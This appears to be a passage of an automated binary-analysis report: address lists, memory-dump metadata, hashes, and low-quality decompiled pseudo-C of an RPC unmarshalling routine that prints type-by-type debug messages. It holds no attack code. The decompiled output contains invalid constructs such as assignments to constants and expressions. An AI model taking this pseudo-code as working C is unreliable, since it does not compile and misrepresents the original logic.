                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994b
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f0
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDA7480: _memset.LIBCMT ref: 6EDA74A6
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memset
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 154592334-1168472477
                                                                                                • Opcode ID: a5e56316ec218451630bb4bc94734564d8bd6e59b71ffcea0955cad929fc440d
                                                                                                • Instruction ID: 4d2a72a32aeae316f0c7037ab017f599829aaa8fba4a126bfa3ef6a621d44a75
                                                                                                • Opcode Fuzzy Hash: a5e56316ec218451630bb4bc94734564d8bd6e59b71ffcea0955cad929fc440d
                                                                                                • Instruction Fuzzy Hash: A7C13BB5A00109AFCB04CF99E890EEA77B9AF89314F04C519FA594F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 24%
                                                                                                			E6EDA9AB5() {
                                                                                                				void* _t210;
                                                                                                				void* _t212;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					while(1) {
                                                                                                						L47:
                                                                                                						 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t210 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t210 - 0xc) =  *( *(_t210 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t210 - 0xc) =  *(_t210 - 0xc) - 1;
                                                                                                							if( *(_t210 - 0xc) > 0xb8) {
                                                                                                								L46:
                                                                                                								0x6eda0000("unhandled format %d\n",  *( *(_t210 + 0x10)) & 0x000000ff);
                                                                                                								_t212 = _t212 + 8;
                                                                                                								while(1) {
                                                                                                									L47:
                                                                                                									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t8 =  *(_t210 - 0xc) + 0x6eda9b24; // 0xcccccc0f
                                                                                                							switch( *((intOrPtr*)(( *_t8 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									E6EDAAFA0( *((intOrPtr*)(_t210 + 8)),  *(_t210 + 0xc), 1);
                                                                                                									_push( *(_t210 + 0xc));
                                                                                                									_push( *( *(_t210 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									_t212 = _t212 + 0x18;
                                                                                                									 *(_t210 + 0xc) =  &(( *(_t210 + 0xc))[0]);
                                                                                                									L47:
                                                                                                									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L12:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [eax]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L13:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									_push(__eax);
                                                                                                									__ecx =  *__edx;
                                                                                                									_push(__ecx);
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L14:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [eax]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L15:
                                                                                                									 *(__ebp - 0x1c) = 0;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									_push("pointer => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(__ecx != 0x11) {
                                                                                                										 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                                										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x1c) = 1;
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp - 0x20);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                                									if( *(__ebp - 0x1c) == 0) {
                                                                                                										L29:
                                                                                                										__edx =  *(__ebp + 0x10);
                                                                                                										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp + 0x14);
                                                                                                											__ecx =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) = __ecx;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L47:
                                                                                                											 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L24:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x20);
                                                                                                										 *( *(__ebp + 8) + 4) = __ecx;
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L29;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L33:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L34:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									L35:
                                                                                                									__edx =  *(__ebp - 0x10);
                                                                                                									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xb:
                                                                                                									L36:
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
                                                                                                									__ecx =  *(__ebp + 0x10);
                                                                                                									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xc:
                                                                                                									L37:
                                                                                                									1 = 1 << 0;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp - 0x18);
                                                                                                									_push( *(__ebp - 0x18));
                                                                                                									_push("embedded complex (size=%d) => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
                                                                                                										__ecx =  *(__ebp - 0x18);
                                                                                                										__edx =  *(__ebp + 0xc);
                                                                                                										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                                									}
                                                                                                									__eax =  *(__ebp - 8);
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__ecx =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__edx =  *(0x6edbb418 + __ecx * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no unmarshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__eax =  *(__ebp - 8);
                                                                                                										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax = __ebp + 0xc;
                                                                                                											_push(__ebp + 0xc);
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											_push(0);
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									goto L0;
                                                                                                								case 0xe:
                                                                                                									L10:
                                                                                                									__edx = __ebp - 0x24;
                                                                                                									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ebp - 0x24);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *__ecx;
                                                                                                									_push( *__ecx);
                                                                                                									_push("int3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
